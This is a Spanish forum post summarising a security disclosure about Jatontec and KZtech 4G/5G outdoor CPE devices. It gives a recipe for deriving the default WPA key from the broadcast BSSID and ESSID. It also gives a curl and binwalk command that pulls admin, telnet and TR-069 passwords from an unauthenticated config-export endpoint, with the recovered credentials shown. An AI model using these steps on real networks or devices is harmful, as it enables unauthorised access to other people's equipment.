Foro Wifi-libre.com

Terrible configuración WPA por defecto en varios CPE de Jatontec y KZtech

  Los fabricantes Jatontec

y KZtech

son especialistas en "outdoor CPE"
Es decir unos Puntos de Acceso/repetidores con antena integrada y diseñado para estar en exteriores - con un enfoque marcado en los productos que combinan WiFi y 3/4/5g.
  Unos dispositivos que suelen estar algo caro por naturaleza...

Dos empresas que hacen concurrencia al conocido fabricante Ubiquiti (o Mirkotic) y que intentan jugar en la misma categoría.
   La cosa es que no basta con montar unos buenos hardware.
Lo que hace el éxito de Ubiquiti o Mikrotic es también su firmware.
  Hablamos en estos casos de auténticos Sistema Operativos  de código abierto con un nivel máximo de seguridad y eficiencia. 
Además se proporciona así una libertad total a los usuarios y un soporte "de por vida".

  Sin embargo los firmwares de los dispositivos Jatonteh y KZtech incriminados son una autentica catástrofe (para no decir algo más vulgar).

La llave WPA por defecto se forma con los 8 últimos dígitos de la dirección mac ethernet del dispositivo

Example defaults:

# ifconfig |grep HWaddr
br0       Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
br0:9     Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2      Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.1    Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.100  Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.1000 Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.2    Link encap:Ethernet  HWaddr 6C:AD:EF:FF:00:01
ra0       Link encap:Ethernet  HWaddr 6C:AD:EF:5D:7C:5C
rai0      Link encap:Ethernet  HWaddr 6C:AD:EF:5E:7C:5C

SSID1=MyWiFi-167C5D
SSID1=MyWiFi-5G-167C5D

WiFi password = EF167C5D

  Esta dirección mac ethernet se usa para el formar el eSSID
Cómo bien sabéis los 6 primeros dígitos (el OUI) de una dirección mac no cambian
Así que para encontrar la llave WPA solo tenemos que escanear:

• Pillamos los dígitos 5 y 6 del bSSID ( 6C:AD:EF:5E:7C:5C)

• Añadimos los 6 dígitos hexadecimales del final del eSSID MyWiFi-167C5D

• Ya tenemos a la llave WPA: EF167C5D

Una configuración digna de los ISP españoles en los años 2000, ya sabes, cuando el wifi era un servicio publico gratis

  Esta brecha no es un drama ya que un essid y una llave WPA se pueden modificar.
Pero el/la/los investigador(es) LiquidWorm ha(n) descubierto muchas más... Podemos por ejemplo obtener la contraseña de administrador muy fácilmente, solo hay que descargar la configuración llamando a cgi-bin...

$ curl -s \
       -o configtest.zlib \ # Default: config.dat
       'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
       binwalk -e configtest.zlib ; \
       cd _configtest.zlib_extracted ; \
       strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
       # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
       cd ..

3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$

Hay también unos credenciales admin de la consola linux de los dispositivos que son  "hardcoded", no se pueden re-configurar...
  Felicidades a los investigadores de Macedonia por su trabajo
Fuentes

• Zero Science Lab

• KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Weak Default WiFi Password Algorithm by LiquidWorm @ Packetstormsecurity